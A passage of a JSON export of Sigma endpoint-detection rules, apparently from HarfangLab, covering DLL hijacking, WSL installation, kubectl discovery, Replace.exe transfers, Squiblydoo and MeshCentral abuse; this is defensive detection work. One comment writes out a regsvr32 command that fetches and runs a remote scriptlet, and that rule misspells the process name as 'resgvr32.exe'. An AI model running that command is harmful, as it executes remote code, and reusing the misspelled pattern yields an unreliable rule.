"rule_id": "9bd41fa6-1686-4e56-9acb-9d309bc02843",
"rule_name": "DLL Hijacking via gpap.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpap.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bf08b63-9d7a-4ba3-9470-11a8e9f8cbdd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607274Z",
"creation_date": "2026-03-23T11:45:34.607278Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607285Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fbi.gov/contact-us/field-offices/denver/news/fbi-denver-warns-of-online-file-converter-scam",
"https://www.bleepingcomputer.com/news/security/fbi-warnings-are-true-fake-file-converters-do-push-malware/",
"https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/",
"https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_scheduled_task_pua.yml",
"content": "title: Scheduled Task Related to PUA\nid: 9bf08b63-9d7a-4ba3-9470-11a8e9f8cbdd\ndescription: |\n Detects the execution of suspicious processes spawned by a scheduled task related to a Potentially Unwanted Application (PUA).\n Attackers use fake online file converter tools to deliver malicious payloads alongside converted files, enabling data theft or ransomware deployment.\n It is recommended to investigate the scheduled task and the executed binary to determine its legitimacy.\nreferences:\n - https://www.fbi.gov/contact-us/field-offices/denver/news/fbi-denver-warns-of-online-file-converter-scam\n - https://www.bleepingcomputer.com/news/security/fbi-warnings-are-true-fake-file-converters-do-push-malware/\n - https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n - https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/09/02\nmodified: 2025/09/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.PUA.MaliciousApp\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n GrandparentCommandLine|endswith:\n - '\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '\\taskeng.exe' # on older windows versions\n OriginalFileName: 'node.exe'\n Image|contains: '\\Users\\\\*\\AppData\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9bf08b63-9d7a-4ba3-9470-11a8e9f8cbdd",
"rule_name": "Scheduled Task Related to PUA",
"rule_description": "Detects the execution of suspicious processes spawned by a scheduled task related to a Potentially Unwanted Application (PUA).\nAttackers use fake online file converter tools to deliver malicious payloads alongside converted files, enabling data theft or ransomware deployment.\nIt is recommended to investigate the scheduled task and the executed binary to determine its legitimacy.\n",
"rule_creation_date": "2025-09-02",
"rule_modified_date": "2025-09-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bfddc67-d9dd-43d5-a677-c0076684a695",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297283Z",
"creation_date": "2026-03-23T11:45:35.297285Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297290Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/wsl/install",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_feature_enabled.yml",
"content": "title: Windows Subsystem for Linux (WSL) Feature Installed\nid: 9bfddc67-d9dd-43d5-a677-c0076684a695\ndescription: |\n Detects the installation of the Windows Subsystem for Linux (WSL) feature.\n While WSL has legitimate uses, threat actors may abuse it to run Linux-based tools and malware, potentially bypassing Windows security controls.\n The installation of WSL should be monitored and correlated with other suspicious activities that might indicate malicious use.\nreferences:\n - https://docs.microsoft.com/en-us/windows/wsl/install\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/01/13\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: CreateKey\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Lxss'\n\n condition: selection\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9bfddc67-d9dd-43d5-a677-c0076684a695",
"rule_name": "Windows Subsystem for Linux (WSL) Feature Installed",
"rule_description": "Detects the installation of the Windows Subsystem for Linux (WSL) feature.\nWhile WSL has legitimate uses, threat actors may abuse it to run Linux-based tools and malware, potentially bypassing Windows security controls.\nThe installation of WSL should be monitored and correlated with other suspicious activities that might indicate malicious use.\n",
"rule_creation_date": "2025-01-13",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bffe914-ce34-4ae1-8879-0978e6753e3e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613194Z",
"creation_date": "2026-03-23T11:45:34.613198Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613205Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md",
"https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://attack.mitre.org/techniques/T1053/007/"
],
"name": "t1053_007_crontab_kubectl_discovery.yml",
"content": "title: Kubectl Scheduled Tasks List Fetched\nid: 9bffe914-ce34-4ae1-8879-0978e6753e3e\ndescription: |\n Detects the execution of the kubectl \"get cronjob\" command to fetch Kubernetes CronJobs.\n An attacker can use the list of Kubernetes CronJobs to inject malicious behaviour in an unprotected Job.\n Is is recommended to investigate the parent process and correlate this alert to any CronJob modifications to look for malicious content.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md\n - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/\n - https://attack.mitre.org/techniques/T1053/007/\ndate: 2023/03/05\nmodified: 2025/05/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1053.007\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/kubectl'\n CommandLine|contains: 'get cronjob'\n\n exclusion_centreon:\n - ProcessAncestors|contains: '/usr/bin/perl|/usr/sbin/centengine|'\n - ProcessCommandLine|startswith: '/usr/bin/perl /usr/lib/centreon/plugins/'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9bffe914-ce34-4ae1-8879-0978e6753e3e",
"rule_name": "Kubectl Scheduled Tasks List Fetched",
"rule_description": "Detects the execution of the kubectl \"get cronjob\" command to fetch Kubernetes CronJobs.\nAn attacker can use the list of Kubernetes CronJobs to inject malicious behaviour in an unprotected Job.\nIs is recommended to investigate the parent process and correlate this alert to any CronJob modifications to look for malicious content.\n",
"rule_creation_date": "2023-03-05",
"rule_modified_date": "2025-05-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1053.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c030998-dfcb-45fc-bd74-0c1f38a2d18d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603344Z",
"creation_date": "2026-03-23T11:45:34.603347Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603355Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Replace/",
"https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_replace_ingress_tool_transfer.yml",
"content": "title: Possible Ingress Tool Transfer via Replace.exe\nid: 9c030998-dfcb-45fc-bd74-0c1f38a2d18d\ndescription: |\n Detects a suspicious execution of Replace.exe to replace a file.\n Adversaries may use Replace.exe to transfer or copy tools or other files from local or external system into a compromised environment.\n It is recommended to check the content of the newly created file and other actions made by the parent process for malicious purpose.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Replace/\n - https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2022/12/02\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Replace\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\replace.exe'\n OriginalFileName: 'REPLACE.EXE'\n\n exclusion_commandline:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\replace.exe'\n - '?:\\WINDOWS\\system32\\replace.exe /?'\n\n exclusion_cygwin:\n ParentImage|endswith: '\\cygwin\\bin\\bash.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c030998-dfcb-45fc-bd74-0c1f38a2d18d",
"rule_name": "Possible Ingress Tool Transfer via Replace.exe",
"rule_description": "Detects a suspicious execution of Replace.exe to replace a file.\nAdversaries may use Replace.exe to transfer or copy tools or other files from local or external system into a compromised environment.\nIt is recommended to check the content of the newly created file and other actions made by the parent process for malicious purpose.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c0f1e65-1213-4bb9-9982-65fc698464c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074512Z",
"creation_date": "2026-03-23T11:45:34.074514Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074519Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_persistence_dll_hijack_sessionenv_tsmsisrv_tsvipsrv.yml",
"content": "title: SessionEnv Service DLL Hijack Detected\nid: 9c0f1e65-1213-4bb9-9982-65fc698464c7\ndescription: |\n Detects the execution of a DLL hijack of the SessionEnv service trying to load the non-existants TSMSISrv.dll or TSVIPSrv.dll DLLs from the system32 directory (the DLLs are actually searched in multiple directories in the search path).\n Attackers can use this DLL hijack to establish persistence by planting a malicious DLL that will be executed upon the start of the SessionEnv service.\n It is recommended to analyze the loaded DLL for malicious contents, as well as to analyze the process responsible for its creation.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/10/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded:\n - '*\\TSMSISrv.dll'\n - '*\\TSVIPSrv.dll'\n Image|endswith: '\\svchost.exe'\n\n filter_signed:\n # on windows server 2019, the 2 DLL ARE present and signed...\n Signature|contains: \"Microsoft Windows\"\n\n exclusion_legit:\n sha256:\n - 'ba7047bf1650b072bed9d3abb3334866c04c28f968066b31ab13a1e7e5b4b3b5' # TSVIPSrv.dll version 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n - 'e5bb0a7e9d9b5733cb078e9da5d7232cce2cc4442b14d8b1f0d3a9e6f1117483' # TSMSISrv.dll version 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n - '1b0d7abf1d3632dcf16dcba1c6c085d82f30c0d412a4cc4c355cfc649be078a5' # TSVIPSrv.dll version 6.3.9600.16384 (winblue_rtm.130821-1623)\n - '601fd73e2f24312b0f891b7d4bb22cffa5285e32437f4941de14ab1bcf11e404' # TSMSISrv.dll version 6.3.9600.16384 (winblue_rtm.130821-1623)\n - 'f279853d20ea6212a3f78c754b4c414acaa2f074d385baaedade0359cb6f60ea' # TSVIPSrv.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - '530db7da2e75330ad9338eb0ce80bf8b7270b9365e25e094836edbe391cdc2ba' # TSMSISrv.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - '9a3bb9988f457272d1f0f200594f8e80fc8065aef22b6badd1396e6a1374aa50' # TSMSISrv.dll version 10.0.17763.1697 (WinBuild.160101.0800)\n - 'ab433507cf4c5f3a1afd4c41c03388e11f66e978b8ba54e15c44fee422e0f38c' # TSVIPSrv.dll version 10.0.17763.1 (WinBuild.160101.0800)\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c0f1e65-1213-4bb9-9982-65fc698464c7",
"rule_name": "SessionEnv Service DLL Hijack Detected",
"rule_description": "Detects the execution of a DLL hijack of the SessionEnv service trying to load the non-existants TSMSISrv.dll or TSVIPSrv.dll DLLs from the system32 directory (the DLLs are actually searched in multiple directories in the search path).\nAttackers can use this DLL hijack to establish persistence by planting a malicious DLL that will be executed upon the start of the SessionEnv service.\nIt is recommended to analyze the loaded DLL for malicious contents, as well as to analyze the process responsible for its creation.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c113891-aff7-41d7-9b05-faa3ef67baf0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085484Z",
"creation_date": "2026-03-23T11:45:34.085486Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085491Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://car.mitre.org/analytics/CAR-2019-04-003/",
"https://attack.mitre.org/techniques/T1218/010/"
],
"name": "t1218_010_squiblydoo_renamed.yml",
"content": "title: Possible Library Squiblydoo Attack Detected\nid: 9c113891-aff7-41d7-9b05-faa3ef67baf0\ndescription: |\n Detects a renamed scrobj.dll being loaded by regsvr32, a technique also known as Squiblydoo.\n Squiblydoo is a specific usage of regsvr32 to load a COM scriptlet directly from the Internet and execute it in a way that bypasses application whitelisting.\n It is recommended to investigate URLs in the command-line of the regsvr32 process, as well as network connections and other surrounding telemetries to determine if this action was legitimate.\nreferences:\n - https://car.mitre.org/analytics/CAR-2019-04-003/\n - https://attack.mitre.org/techniques/T1218/010/\ndate: 2021/03/31\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.LOLBin.Scrobj\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n # copy C:\\windows\\system32\\scrobj.dll C:\\temp\\my.dll\n # regsvr32.exe -u -s -i:https://google.fr c:\\temp\\my.dll\n selection:\n Image|endswith: '\\resgvr32.exe'\n OriginalFileName: 'scrobj.dll'\n\n filter_scrobj:\n ImageLoaded|contains: 'scrobj'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c113891-aff7-41d7-9b05-faa3ef67baf0",
"rule_name": "Possible Library Squiblydoo Attack Detected",
"rule_description": "Detects a renamed scrobj.dll being loaded by regsvr32, a technique also known as Squiblydoo.\nSquiblydoo is a specific usage of regsvr32 to load a COM scriptlet directly from the Internet and execute it in a way that bypasses application whitelisting.\nIt is recommended to investigate URLs in the command-line of the regsvr32 process, as well as network connections and other surrounding telemetries to determine if this action was legitimate.\n",
"rule_creation_date": "2021-03-31",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c3c82c3-639f-48aa-8b71-0226e015feec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076868Z",
"creation_date": "2026-03-23T11:45:34.076881Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076885Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vsgraphicsremoteengine.yml",
"content": "title: DLL Hijacking via vsgraphicsremoteengine.exe\nid: 9c3c82c3-639f-48aa-8b71-0226e015feec\ndescription: |\n Detects potential Windows DLL Hijacking via vsgraphicsremoteengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vsgraphicsremoteengine.exe'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\webservices.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c3c82c3-639f-48aa-8b71-0226e015feec",
"rule_name": "DLL Hijacking via vsgraphicsremoteengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vsgraphicsremoteengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c63e668-44a3-458f-973f-62af5e790af6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082942Z",
"creation_date": "2026-03-23T11:45:34.082944Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082948Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://meshcentral.com/info/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_abnormal_meshcentral_agent_execution.yml",
"content": "title: Abnormal MeshCentral Agent Execution\nid: 9c63e668-44a3-458f-973f-62af5e790af6\ndescription: |\n Detects the abnormal execution of a MeshCentral agent being executed on the target host.\n This rule detects MeshAgent being executed with a renamed executable or from an unconventional directory.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n It is recommended to investigate the parent process for suspicious activities as well as to look for other malicious actions stemming from the installed MeshCentral agent.\nreferences:\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://meshcentral.com/info/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/10/06\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ProcessInternalName: 'MeshAgent'\n - ProcessDescription: 'Mesh Agent Service'\n - ProcessProduct: 'Mesh Agent Service'\n - 